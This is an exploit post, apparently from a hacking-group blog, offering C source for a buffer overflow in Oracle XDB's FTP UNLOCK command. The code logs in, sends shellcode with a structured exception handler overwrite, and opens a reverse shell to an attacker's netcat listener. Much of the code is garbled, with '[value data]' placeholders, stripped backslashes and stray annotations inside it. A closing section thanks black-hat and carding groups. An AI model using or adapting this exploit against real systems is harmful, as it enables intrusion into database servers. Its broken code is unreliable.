Oracle XDB FTP service UNLOCK buffer overflow

[+] vulnerabilities network level/stack based buffer overflow
[+] special network layer attack
[+] implemented over http/XML-db/ftp==>windows XDB
[+] connecting:8080
[=] operation: win 32-->xdb overflow
[+] author mc2_s3lector
[+] yogyacarderlink.web.id/KeDai Computerworks.com


exploit win32
#include
#include
#include

int GainControlOfOracle(char *, char *);
int StartWinsock(void);
int SetUpExploit(char *,int);

struct sockaddr_in s_sa;
struct hostent *he;
unsigned int addr;
char host[value data]="";

//register acces\
unsigned char exploit[value data]=
"x55x8BxECxEBx03x5BxEBx05xE8xF8xFFxFFxFFxBExFFxFF"
"xFFxFFx81xF6xDCxFExFFxFFx03xDEx33xC0x50x50x50x50"
"x50x50x50x50x50x50xFFxD3x50x68x61x72x79x41x68x4C"
"x69x62x72x68x4Cx6Fx61x64x54xFFx75xFCxFFx55xF4x89"
"x45xF0x83xC3x63x83xC3x5Dx33xC9xB1x4ExB2xFFx30x13"
"x83xEBx01xE2xF9x43x53xFFx75xFCxFFx55xF4x89x45xEC"
"x83xC3x10x53xFFx75xFCxFFx55xF4x89x45xE8x83xC3x0C"
"x53xFFx55xF0x89x45xF8x83xC3x0Cx53x50xFFx55xF4x89"
"x45xE4x83xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xE0x83"
"xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xDCx83xC3x08x89"
"x5DxD8x33xD2x66x83xC2x02x54x52xFFx55xE4x33xC0x33"
"xC9x66xB9x04x01x50xE2xFDx89x45xD4x89x45xD0xBFx0A"
"x01x01x26x89x7DxCCx40x40x89x45xC8x66xB8xFFxFFx66"
"x35xFFxCAx66x89x45xCAx6Ax01x6Ax02xFFx55xE0x89x45"
"xE0x6Ax10x8Dx75xC8x56x8Bx5DxE0x53xFFx55xDCx83xC0"
"x44x89x85x58xFFxFFxFFx83xC0x5Ex83xC0x5Ex89x45x84"
"x89x5Dx90x89x5Dx94x89x5Dx98x8DxBDx48xFFxFFxFFx57"
"x8DxBDx58xFFxFFxFFx57x33xC0x50x50x50x83xC0x01x50"
"x83xE8x01x50x50x8Bx5DxD8x53x50xFFx55xECxFFx55xE8"
"x60x33xD2x83xC2x30x64x8Bx02x8Bx40x0Cx8Bx70x1CxAD"
"x8Bx50x08x52x8BxC2x8BxF2x8BxDAx8BxCAx03x52x3Cx03"
"x42x78x03x58x1Cx51x6Ax1Fx59x41x03x34x08x59x03x48"
"x24x5Ax52x8BxFAx03x3Ex81x3Fx47x65x74x50x74x08x83"
"xC6x04x83xC1x02xEBxECx83xC7x04x81x3Fx72x6Fx63x41"
"x74x08x83xC6x04x83xC1x02xEBxD9x8BxFAx0FxB7x01x03"
"x3Cx83x89x7Cx24x44x8Bx3Cx24x89x7Cx24x4Cx5Fx61xC3"
"x90x90x90xBCx8Dx9Ax9Ex8Bx9AxAFx8Dx90x9Cx9Ax8Cx8C"
"xBExFFxFFxBAx87x96x8BxABx97x8Dx9Ax9Ex9BxFFxFFxA8"
"x8CxCDxA0xCCxCDxD1x9Bx93x93xFFxFFxA8xACxBExACx8B"
"x9Ex8Dx8Bx8Ax8FxFFxFFxA8xACxBExACx90x9Cx94x9Ax8B"
"xBExFFxFFx9Cx90x91x91x9Ax9Cx8BxFFx9Cx92x9BxFFxFF"
"xFFxFFxFFxFF";

char exploit_code[value data]=
"UNLOCK / put character"
"put character"
"put character"
"put character"
"put character" --------->char or nummeric-----or combine chart&nummeric
"5eeefffggghhh";

char exception_handler[value dataX]="x79x9Bxf7x77";
char short_jump[value dataX]="xEBx06x90x90";


int main(int argc, char *argv[])
{

if(argc != 6)
{
printf("nntOracle XDB FTP Service UNLOCK Buffer Overflow
Exploit");
printf("nntSpawns a reverse shell to specified port");
printf("nntUsage:t%s host userid password ipaddress
port",argv[0]);
printf("nt6th maret 2010nnn");
return 0;
}

strncpy(host,argv[1],250);
if(StartWinsock()==0)
return printf("Error starting Winsock.n");

SetUpExploit(argv[4],atoi(argv[5]));

strcat(exploit_code,short_jump);
strcat(exploit_code,exception_handler);
strcat(exploit_code,exploit);
strcat(exploit_code,"rn");

GainControlOfOracle(argv[2],argv[3]);

return 0;

}


int SetUpExploit(char *myip, int myport)--->protocol
{
unsigned int ip=0;
unsigned short prt=0;
char *ipt="";
char *prtt="";

ip = inet_addr(myip);

ipt = (char*)&ip;
exploit[value data]=ipt[0];
exploit[value data]=ipt[1];
exploit[value data]=ipt[2];
exploit[value data]=ipt[3];

// set the TCP port to connect on
// netcat should be listening on this port
// e.g. nc -l -p 80

prt = htons((unsigned short)myport);
prt = prt ^ 0xFFFF;
prtt = (char *) &prt;
exploit[value data]=prtt[0];
exploit[value data]=prtt[1];

return 0;
}


int StartWinsock()
{
int err=0;
WORD wVersionRequested;
WSADATA wsaData;

wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
return 0;
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) !=
0 )
{
WSACleanup( );
return 0;
}

if (isalpha(host[0]))
{
he = gethostbyname(host);
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
}
else
{
addr = inet_addr(host);
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,&addr,4);
he = (struct hostent *)1;
}

if (he == NULL)
{
return 0;
}
return 1;
}



int GainControlOfOracle(char *user, char *pass)
{

char usercmd[value dataXX]="user ";
char passcmd[value dataXX]="pass ";
char resp[1600]="";
int snd=0,rcv=0;
struct sockaddr_in r_addr;
SOCKET sock;


strncat(usercmd,user,230);
strcat(usercmd,"rn");
strncat(passcmd,pass,230);
strcat(passcmd,"rn");


sock=socket(AF_INET,SOCK_STREAM,0);
if (sock==INVALID_SOCKET)
return printf(" sock error");

r_addr.sin_family=AF_INET;
r_addr.sin_addr.s_addr=INADDR_ANY;
r_addr.sin_port=htons((unsigned short)0);
s_sa.sin_port=htons((unsigned short)2100);


if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
return printf("Connect error");

rcv = recv(sock,resp,1500,0);
printf("%s",resp);
ZeroMemory(resp,1600);

snd=send(sock, usercmd , strlen(usercmd) , 0);
rcv = recv(sock,resp,1500,0);
printf("%s",resp);
ZeroMemory(resp,1600);

snd=send(sock, passcmd , strlen(passcmd) , 0);
rcv = recv(sock,resp,1500,0);
printf("%s",resp);
if(resp[0]=='5')
{
closesocket(sock);
return printf("Failed to log in using user %s and password
%s.n",user,pass);
}
ZeroMemory(resp,1600);

snd=send(sock, exploit_code, strlen(exploit_code) , 0);

Sleep(2000);

closesocket(sock);
return 0;
}


big thank to;
indonesian black hat team(www.yogyacarderlink.web.id)
KeDaiComputerworks.com
Jasakom(jasakom.com)
indonesianhacker.org
Indesign COmputer Care (INDESIGN)
Indonesian hacker(indonesianhacker.org)
one-day(the-codec),n3r0,elpaciano


http://www.vfocus.net/art/20100318/6787.html
http://securityreason.com/polish/pokaz_podwlb/WLB-2010030080
http://packetstormsecurity.org/1003-exploits/oraclexdb-overflow.txt
http://www.secnews.co.uk/article/17341/oraclexdb-overflow.txt


Category Article

What's on Your Mind...

Thank f' u C0mment